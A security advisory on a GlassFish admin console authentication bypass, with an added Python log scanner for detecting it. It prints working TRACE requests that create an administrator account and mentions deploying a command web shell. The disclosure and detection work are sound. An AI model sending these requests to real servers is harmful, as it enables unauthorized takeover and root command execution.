Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass

Summary

Name: Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass Vulnerability
Release Date: 5 January 2012
Reference: NGS00106
Discoverer: David Spencer
Vendor: Oracle
Vendor Reference:
Systems Affected: Oracle GlassFish Server 2.1 and 3
Risk: High
Status: Published

Timeline

Discovered: 26 August 2011
Released: 26 August 2011
Approved: 26 August 2011
Reported: 26 August 2011
Fixed: July 2011
Published: 5 January 2012

Description

Core Security published a bug in the Oracle GlassFish Server Administration Console on 5th May 2011, which can be found here:
http://www.securityfocus.com/archive/1/517965/30/0/threaded
and here
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1511

That issue was rated medium because it was understood only to return sensitive information. A full fix has been released by Oracle.

NGS found that it is possible to use this issue to create a GlassFish administrator account as an unauthenticated user.

Technical Details

There is a known authentication bypass in GlassFish: by using the TRACE method rather than the GET method it is possible to access data meant only for GlassFish administrators.
The following requests were used to create a new GlassFish administrator:

TRACE /common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&bare=true HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://10.65.78.211:4848/common/security/realms/manageUsers.jsf?name=admin-realm&configName=server-config&bare=true
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574

This gave access to the create-user page. Note that when the submit button is pressed, the resulting POST request must also be converted to a TRACE request:

TRACE /common/security/realms/manageUserNew.jsf?propertyForm%3ApropertySheet%3ApropertSectionTextField%3AuserIdProp%3AUserId=NGSSecure&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnewPasswordProp%3ANewPassword=Password!!&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AconfirmPasswordProp%3AConfirmPassword=Password!!&propertyForm%3AhelpKey=ref-filerealmusernew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=-2309913764624097582%3A-2546877703812727807&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.source=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&bare=true&propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.ajax=true HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.65.78.211:4848/common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config
Content-Length: 0
Cookie: JSESSIONID=ada23501f36f1ec9148589e9a574
Pragma: no-cache
Cache-Control: no-cache

This created a user called NGSSecure with a password of Password!!

NGS then logged on to the GlassFish administration console using this newly created user. Once logged on as this user it was possible to upload and deploy a web application: NGS deployed cmd.war, which allowed the user to run commands in the context of the GlassFish server process, which runs as root by default.

Fix Information

This issue has been fixed in GlassFish 3.1. A workaround also exists: disable the TRACE method on the administration console's web port.
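As an added example that is not part of the advisory: a small Python routine that scans access-log lines for TRACE requests against the administration console tree, which is how both the bypass described above and the TRACE-disabling workaround show up in server logs. The log lines and their Common Log Format layout are constructed for this example (an assumption, not GlassFish's native log format); the `/common/` prefix and the `manageUserNew.jsf` page are taken from the requests above.

```python
import re

# Constructed access-log lines in Common Log Format; not real traffic.
# The TRACE requests mirror the console paths used in the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Aug/2011:10:01:12 +0100] "GET /login.jsf HTTP/1.1" 200 5120
10.0.0.5 - - [26/Aug/2011:10:01:20 +0100] "TRACE /common/security/realms/manageUsers.jsf?name=admin-realm&configName=server-config HTTP/1.1" 200 8810
10.0.0.5 - - [26/Aug/2011:10:01:33 +0100] "TRACE /common/security/realms/manageUserNew.jsf?propertyForm%3AhelpKey=ref-filerealmusernew.html HTTP/1.1" 200 230
10.0.0.9 - - [26/Aug/2011:10:02:01 +0100] "OPTIONS / HTTP/1.1" 200 0
10.0.0.7 - - [26/Aug/2011:10:03:45 +0100] "TRACE /common/index.jsf HTTP/1.1" 405 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?:\d+|-)$'
)

ADMIN_PREFIX = "/common/"          # admin console tree, as in the advisory's requests
USER_CREATE = "manageUserNew.jsf"  # page used to add a user to admin-realm


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Return a finding for a TRACE request to the admin console, else None."""
    if entry["method"] != "TRACE" or not entry["path"].startswith(ADMIN_PREFIX):
        return None
    status = int(entry["status"])
    return {
        "ip": entry["ip"], "ts": entry["ts"], "path": entry["path"], "status": status,
        # A 2xx means the console served the TRACE request, so the bypass is live;
        # a 405/403 means the method is blocked, i.e. the workaround is in effect.
        "severity": "high" if 200 <= status < 300 else "blocked",
        "user_creation": USER_CREATE in entry["path"],
    }


def find_trace_bypass(log_text):
    """Scan a block of log text and return findings in log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        finding = classify(entry) if entry else None
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in find_trace_bypass(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["status"], f["path"])
```

A "high" finding against `manageUserNew.jsf` is the account-creation step of the bypass and warrants checking the admin realm for unexpected users.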
